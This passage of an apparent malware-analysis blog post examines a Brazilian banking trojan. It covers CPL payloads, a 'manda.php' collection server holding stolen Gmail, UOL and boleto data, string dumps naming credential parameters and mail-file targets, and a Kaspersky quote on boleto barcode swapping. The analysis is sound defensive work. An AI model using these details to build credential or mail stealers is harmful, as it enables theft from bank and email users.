<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9Sz_om8NN-ipJfIkPFisRE1iDxMujAPdsCCEjPgtZiM1wEuZaWsquvg8mUX9Nj7zqr2txcw7Romo6Rldq6RYqguWLWcdsPMvrKDir6aydodeahouHtAE5gR0J_qFKMYMAFs6uUuwOsw/s1600/Image10.Picture.Data.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq9Sz_om8NN-ipJfIkPFisRE1iDxMujAPdsCCEjPgtZiM1wEuZaWsquvg8mUX9Nj7zqr2txcw7Romo6Rldq6RYqguWLWcdsPMvrKDir6aydodeahouHtAE5gR0J_qFKMYMAFs6uUuwOsw/s1600/Image10.Picture.Data.gif" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL7H_egCTDPpnWwVu4P9qOW78TuXOtzutUCkJig3-mWPEDYL3xmAFa7p7zyaVuQpr6w7fea9fKqv67i1rZdGL3fh6OPUKkyob_Kf_ycxj7or1ZBSf6OijSFojL_99Mrz-mhaU5DZHGREo/s1600/Image14.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhL7H_egCTDPpnWwVu4P9qOW78TuXOtzutUCkJig3-mWPEDYL3xmAFa7p7zyaVuQpr6w7fea9fKqv67i1rZdGL3fh6OPUKkyob_Kf_ycxj7or1ZBSf6OijSFojL_99Mrz-mhaU5DZHGREo/s1600/Image14.Picture.Data.png" height="161" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj32dGl-baSQSCCyrffhoRirOwlK4Q2iwmVnAQVD7L1qiwplS8LPRqeArnEIkJ-PAoUzEZixETFpmY7d6bPEYjZ35ZyAYybFI9l4S6qrnWspGVVtidUQ1ENLlwEN1hdKxCK4xwWNTX4h64/s1600/Image17.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj32dGl-baSQSCCyrffhoRirOwlK4Q2iwmVnAQVD7L1qiwplS8LPRqeArnEIkJ-PAoUzEZixETFpmY7d6bPEYjZ35ZyAYybFI9l4S6qrnWspGVVtidUQ1ENLlwEN1hdKxCK4xwWNTX4h64/s1600/Image17.Picture.Data.png" height="92" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidzyMCNj3L43NoO2nJea6KSFzcm1MseOgPFB3IRhRP1UjEKm-X8DtXcks3lbYwKQ01MkGqOS7RVX13rXZLSvlEue0H2-hu6y6YhRGNmg6Kjc8jqPnKkLrXUOOGN18EJ72epcoJW5rx1hk/s1600/Image25.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidzyMCNj3L43NoO2nJea6KSFzcm1MseOgPFB3IRhRP1UjEKm-X8DtXcks3lbYwKQ01MkGqOS7RVX13rXZLSvlEue0H2-hu6y6YhRGNmg6Kjc8jqPnKkLrXUOOGN18EJ72epcoJW5rx1hk/s1600/Image25.Picture.Data.png" /></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEindA9iiXW7hpZgdnR3CJiY1iiZg2L1mYiwy7yc8luxUVdrgSVJrX1UGCs1V99AhMgpNsh4rTEvSiMNb5ta7iKveeS_Rnxzc_CoLRCrV1wZLTWTqat5NERSupeANtNxWhHdKYSBM9gSpW4/s1600/Image3.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEindA9iiXW7hpZgdnR3CJiY1iiZg2L1mYiwy7yc8luxUVdrgSVJrX1UGCs1V99AhMgpNsh4rTEvSiMNb5ta7iKveeS_Rnxzc_CoLRCrV1wZLTWTqat5NERSupeANtNxWhHdKYSBM9gSpW4/s1600/Image3.Picture.Data.png" height="159" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeOIOvk_r8CIrv4C9wKtWURoVaWdvEl0xPON4DY4x1uKPGUKEuFV6yp1Xepx0IDcZzBRZ5vEOxSwvwmciKYWZ3uKIF14SIwCVlkPkPFLx8SkURiP7Mi_df0yxTWThE5bg8Mb6yDEg9tg/s1600/Image4.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIeOIOvk_r8CIrv4C9wKtWURoVaWdvEl0xPON4DY4x1uKPGUKEuFV6yp1Xepx0IDcZzBRZ5vEOxSwvwmciKYWZ3uKIF14SIwCVlkPkPFLx8SkURiP7Mi_df0yxTWThE5bg8Mb6yDEg9tg/s1600/Image4.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9WL0sXMQQwYtXWjNTonJuBU_VAMx7iV3lly5dO130ENvrXxdC8vruTUsbVL7hSX5RkQXTANmaNK_46o0SDa9y_uEHa8gEyg36R6_4CKS6Sv6syukbiwc_jKu_OEEfJbU-pIz9ob2lNY/s1600/Image5.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiC9WL0sXMQQwYtXWjNTonJuBU_VAMx7iV3lly5dO130ENvrXxdC8vruTUsbVL7hSX5RkQXTANmaNK_46o0SDa9y_uEHa8gEyg36R6_4CKS6Sv6syukbiwc_jKu_OEEfJbU-pIz9ob2lNY/s1600/Image5.Picture.Data.png" height="39" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0Py2vSzl7rHNUkOIyC_zzGrvYrNizHzY5xjtoiFDocgGiCh6poSEvFG9krFfZxZ04Tn7tR98YfX6Nph0mHrSF7ozsRu5j1W-TO_afCrHurUQTNS6dJVHItx9JQCO1mUl9m-N6qUG4Nw/s1600/Image7.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb0Py2vSzl7rHNUkOIyC_zzGrvYrNizHzY5xjtoiFDocgGiCh6poSEvFG9krFfZxZ04Tn7tR98YfX6Nph0mHrSF7ozsRu5j1W-TO_afCrHurUQTNS6dJVHItx9JQCO1mUl9m-N6qUG4Nw/s1600/Image7.Picture.Data.png" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKThGPhMQKzrzho4w0TKbvdHLws9ewdaGeuIn55ycBEr2uYv1WAzk91_DcQoMEiSSnwQssEvJmPqpz1Aj4tMcX_N1NUi6k8H8Igg7l9nz04Ed6O_8scLArMv49G3plNUEHbRCHvQB8JU/s1600/Image11.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUKThGPhMQKzrzho4w0TKbvdHLws9ewdaGeuIn55ycBEr2uYv1WAzk91_DcQoMEiSSnwQssEvJmPqpz1Aj4tMcX_N1NUi6k8H8Igg7l9nz04Ed6O_8scLArMv49G3plNUEHbRCHvQB8JU/s1600/Image11.Picture.Data.png" height="119" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XR-NC-mjml8cPSZftOlEm8V2Lpizq-qiGVI0cXjK9kObC5L7ZANa37SMTyeIrp6xnHVD0YL_hBS-H9NvpQRsVKL4cQq_xm-qSST7_8-W6XCk4IbniZV1pASrCRDNqFdNmU4VBflfhHo/s1600/Image14.Picture.Data.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XR-NC-mjml8cPSZftOlEm8V2Lpizq-qiGVI0cXjK9kObC5L7ZANa37SMTyeIrp6xnHVD0YL_hBS-H9NvpQRsVKL4cQq_xm-qSST7_8-W6XCk4IbniZV1pASrCRDNqFdNmU4VBflfhHo/s1600/Image14.Picture.Data.gif" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsVz3gE2AMySFTnCbMqYFhGjE0MWEp3InuGM5HIMyj2yOpFiEQNG6ZAMbTtrOQPvpIUC0yp7Ct7cCLkd6bLnOQVDQBNrRvrphsQPJQvr7SMxPWffo4Hzf22NdnwgWc4FGW7h050G87mQ/s1600/Image19.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfsVz3gE2AMySFTnCbMqYFhGjE0MWEp3InuGM5HIMyj2yOpFiEQNG6ZAMbTtrOQPvpIUC0yp7Ct7cCLkd6bLnOQVDQBNrRvrphsQPJQvr7SMxPWffo4Hzf22NdnwgWc4FGW7h050G87mQ/s1600/Image19.Picture.Data.png" height="46" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpLutyxXOe9W73abb3oq23xuoL_be3kCweGZrpvgYnpkRC6bOBYeOtf1qoYAoJYfFG7OZLaPJ78Xm52YJHE8vMIFLHfRyPm4lq-_x_BL5-Dr_p39ZFMCDsLV-CGLXMQLUx9NOGjx6lF4c/s1600/Image22.Picture.Data.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpLutyxXOe9W73abb3oq23xuoL_be3kCweGZrpvgYnpkRC6bOBYeOtf1qoYAoJYfFG7OZLaPJ78Xm52YJHE8vMIFLHfRyPm4lq-_x_BL5-Dr_p39ZFMCDsLV-CGLXMQLUx9NOGjx6lF4c/s1600/Image22.Picture.Data.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS078iiUmWcc5e38oAy3vCRIu6Ekg4D5maRAE_T_sbB9OPlePDo4QveVkcRB6Jel9XvM1BNXEX8K36PUMcoyHDk3clicuzSShVWHCPRGV7RWKcKKrlhsJHsdAhI7sWU-JMHYI0qNVEgFE/s1600/bancodobrasil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS078iiUmWcc5e38oAy3vCRIu6Ekg4D5maRAE_T_sbB9OPlePDo4QveVkcRB6Jel9XvM1BNXEX8K36PUMcoyHDk3clicuzSShVWHCPRGV7RWKcKKrlhsJHsdAhI7sWU-JMHYI0qNVEgFE/s1600/bancodobrasil.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbu9nZOc1hzfTpA0ZXXhgt1M7Zfhh42wcFRrv5TnlaxMsJSHFrG-0P5nSy0_9vxoCG1VTobHV8L5mu9HlBQplbj-pqBFP5yAlcvYh5vG7Jl-BuGXaNasfdBqJFY8cGBEjsahw5gYanqI/s1600/caixa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIbu9nZOc1hzfTpA0ZXXhgt1M7Zfhh42wcFRrv5TnlaxMsJSHFrG-0P5nSy0_9vxoCG1VTobHV8L5mu9HlBQplbj-pqBFP5yAlcvYh5vG7Jl-BuGXaNasfdBqJFY8cGBEjsahw5gYanqI/s1600/caixa.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Data stored on the server through <b>manda.php</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKkOA0Cw3PsVeF8xC_AFZ7wUdHEevZDGpev3LLK7paW6ECJAQlhGVsgOadzoEKX6NzYkAjrOLVxk0vlFHqo6w00KKO1ST05Gr4pfSEbbis1BJ1a8qZQL7VXHWjB3X_8-NfOVtxH6U8NnQ/s1600/datosrobados-c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKkOA0Cw3PsVeF8xC_AFZ7wUdHEevZDGpev3LLK7paW6ECJAQlhGVsgOadzoEKX6NzYkAjrOLVxk0vlFHqo6w00KKO1ST05Gr4pfSEbbis1BJ1a8qZQL7VXHWjB3X_8-NfOVtxH6U8NnQ/s1600/datosrobados-c.jpg" height="640" width="404" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Data found on the server:</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Gmail</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Lx3OLqjWZBlLJQPT_bVMqghaRJK_11aJ2Cmkep2I17Jdrjwr8rGgetyN9SKW5bAepdigvO4OfN_o1_JK-fBNT73UfrNbbotYJ-3A7U8S0fpqTmUkIf7w810WncUJxxBJ_YqNLqPHIak/s1600/gmail.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Lx3OLqjWZBlLJQPT_bVMqghaRJK_11aJ2Cmkep2I17Jdrjwr8rGgetyN9SKW5bAepdigvO4OfN_o1_JK-fBNT73UfrNbbotYJ-3A7U8S0fpqTmUkIf7w810WncUJxxBJ_YqNLqPHIak/s1600/gmail.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Uol</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZ4eFt1GCqiP1HMbdTynKZ7luvbWMqZIjBocSbU6gqLrMDqUtFiJSP-701x5Qzi2FGMjHIyrd1UK1NCHgTDTtxvVanNUUvblt0iyDEFlEF_VT30U_3877uukbajzSuXMjEM1YFWOejFs/s1600/uol-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuZ4eFt1GCqiP1HMbdTynKZ7luvbWMqZIjBocSbU6gqLrMDqUtFiJSP-701x5Qzi2FGMjHIyrd1UK1NCHgTDTtxvVanNUUvblt0iyDEFlEF_VT30U_3877uukbajzSuXMjEM1YFWOejFs/s1600/uol-b.jpg" height="640" width="358" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Banking data / Boletos</span></b></div>
<div class="separator" style="clear: both; text-align: left;">
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJY9GKrMhP88iBzSebyp_q22G0_-XWYmL0R5t4EegOHNKb0nLP4M4RhyIehAAeRWJKYpIZ7mtcC5EPNQoJMrdtsJIcRUmyfSu6XQ4D2rz1YocyqRFhCZBhCFEODzErPWl3Zrth4zHiOz8/s1600/datosbancarios.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJY9GKrMhP88iBzSebyp_q22G0_-XWYmL0R5t4EegOHNKb0nLP4M4RhyIehAAeRWJKYpIZ7mtcC5EPNQoJMrdtsJIcRUmyfSu6XQ4D2rz1YocyqRFhCZBhCFEODzErPWl3Zrth4zHiOz8/s1600/datosbancarios.jpg" height="282" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br /></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>5.txt </b>(a CPL, that is a Control Panel DLL, which the downloader loads into memory)</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">VirusTotal analysis</span></div>
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1MHv8DWvFK3_dodnXyUSmDcNCADzgKOO25LLlK8F54Qma8AK5c1puUIu9MyjO_oBZU5a_0otKWgKQFgSVQyU9M_N-VkT4-r9tpjILxvDHFRnXF5FXP9X_9EsSxyZo6SEdf3Ir8etDRM0/s1600/vt3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1MHv8DWvFK3_dodnXyUSmDcNCADzgKOO25LLlK8F54Qma8AK5c1puUIu9MyjO_oBZU5a_0otKWgKQFgSVQyU9M_N-VkT4-r9tpjILxvDHFRnXF5FXP9X_9EsSxyZo6SEdf3Ir8etDRM0/s1600/vt3.jpg" height="186" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>Strings:</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489DF0 &lt;AnsiString&gt; 'ServletGeraImg?acao=barra'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E14 &lt;AnsiString&gt; '984'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E20 &lt;AnsiString&gt; 'codbar'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E30 &lt;AnsiString&gt; '987'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E3C &lt;AnsiString&gt; 'CodigoBarra'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E50 &lt;AnsiString&gt; 'op=bolas'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E64 &lt;AnsiString&gt; 'log='</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E74 &lt;AnsiString&gt; 'sen='</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E84 &lt;AnsiString&gt; ' 30/07'</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489E94 &lt;AnsiString&gt; 'vlr='</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489EA4 &lt;AnsiString&gt; 'dts='</span></div>
<div class="separator" style="clear: both;">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 00489EB0 &lt;WideString&gt; 'sit=\07??'</span></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">JavaScript code</span></b></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLJI8614i9ircDcs1q9TU2cgzSFmbvw-UgXyrLnne91p_NsJay2G6Wib3RTT-jIY959xKzBLagcaLitCgz-YC0Koxcmts69o1iQ6JJwsXlseDnVfYWCwQSPqOXWC9QoEQTouBiTLseEU/s1600/boletos.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLJI8614i9ircDcs1q9TU2cgzSFmbvw-UgXyrLnne91p_NsJay2G6Wib3RTT-jIY959xKzBLagcaLitCgz-YC0Koxcmts69o1iQ6JJwsXlseDnVfYWCwQSPqOXWC9QoEQTouBiTLseEU/s1600/boletos.jpg" height="516" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">This trojan appears to be related to Boleto theft; the Boleto is a very popular payment method in Brazil.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">You can read the article on this topic on the <a href="http://blog.kaspersky.es/boletos-lo-que-podemos-aprender/">Kaspersky</a> blog:</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: justify;">
<span style="background-color: white; color: #535353; font-size: 14px; line-height: 23.799999237060547px; text-align: start;"><span style="font-family: Arial, Helvetica, sans-serif;">The trick is not complicated, Bestúzhev explained. While a user is printing their Boleto, a trojan on the victim's computer modifies the Boleto's barcode. The printed Boleto is then useless. The criminal later uses the Boleto's legitimate barcode to transfer money to his own account.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><b>6.txt </b> (a CPL that is loaded into memory by the downloader)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both;">
<span style="font-family: Arial, Helvetica, sans-serif;">Analysis on V.T. </span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6OpRTcOUTqFHqpMmosPxWBXrGFj4MaGpK2TdZYzxkMaB068oVa8rumCUEBwhGh_ncUj4p82vSRX1gjsTEtVCTIFAr6Wa0AbTc8nt0F3zeiSq9-zAW3-TfgeOmUOvfLcxiz7Ma41uG_oE/s1600/vt4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6OpRTcOUTqFHqpMmosPxWBXrGFj4MaGpK2TdZYzxkMaB068oVa8rumCUEBwhGh_ncUj4p82vSRX1gjsTEtVCTIFAr6Wa0AbTc8nt0F3zeiSq9-zAW3-TfgeOmUOvfLcxiz7Ma41uG_oE/s1600/vt4.jpg" height="180" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;">Strings:</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FFB0 <ansistring> 'op=fc'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FFC0 <ansistring> 'log='</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047F3CC <ansistring> 'L-O-O-K'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FD58 <ansistring> 'Documents and Settings'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FD78 <ansistring> '\\Desk'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FD88 <ansistring> 'u8v7DgLUz2nC'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDA0 <ansistring> 'xeq'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDAC <ansistring> 'xerHzg6ZigrLigfWBgLJyxrPDM6Zxa'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDD4 <ansistring> 'vxnLCNnC'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FDE8 <ansistring> '\\AppData\\Roaming\\'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE04 <ansistring> 'i'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE10 <ansistring> 'Password:'</ansistring></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"> 0047FE3C <ansistring> 'Fimsmtp'</ansistring></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"> 0047FE78 <ansistring> 'id.sys'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE88 <ansistring> 'al'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047FE94 <ansistring> 'Ahr7CdOV</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C114 <ansistring> 'dbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C120 <ansistring> 'wab'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C408 <ansistring> '*.dbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C418 <ansistring> 'C:\\'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C424 <ansistring> 'dbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C430 <ansistring> '*.wab'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C440 <ansistring> 'wab'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C44C <ansistring> '*.mbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C45C <ansistring> 'mbx'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C468 <ansistring> '*.mai'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C478 <ansistring> 'mai'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C484 <ansistring> '*.eml'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C494 <ansistring> 'eml'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4A0 <ansistring> '*.tbb'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4B0 <ansistring> 'c:\\'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4BC <ansistring> 'tbb'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4C8 <ansistring> '*.mbox'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C4D8 <ansistring> 'mbox'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9BC <ansistring> 'ps'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9C8 <ansistring> 'to'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9D4 <ansistring> 're'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9E0 <ansistring> 'c.'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9EC <ansistring> 'dl'</ansistring></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> 0047C9F8 <ansistring> 'l'</ansistring></span><br />
<br />
<br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">They decode as:</span></b><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> \Software\Microsoft\Internet Account Manager\Accounts</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Identi</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Account Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Account Name</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Nome .....: </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">SMTP Display Name</span><br />
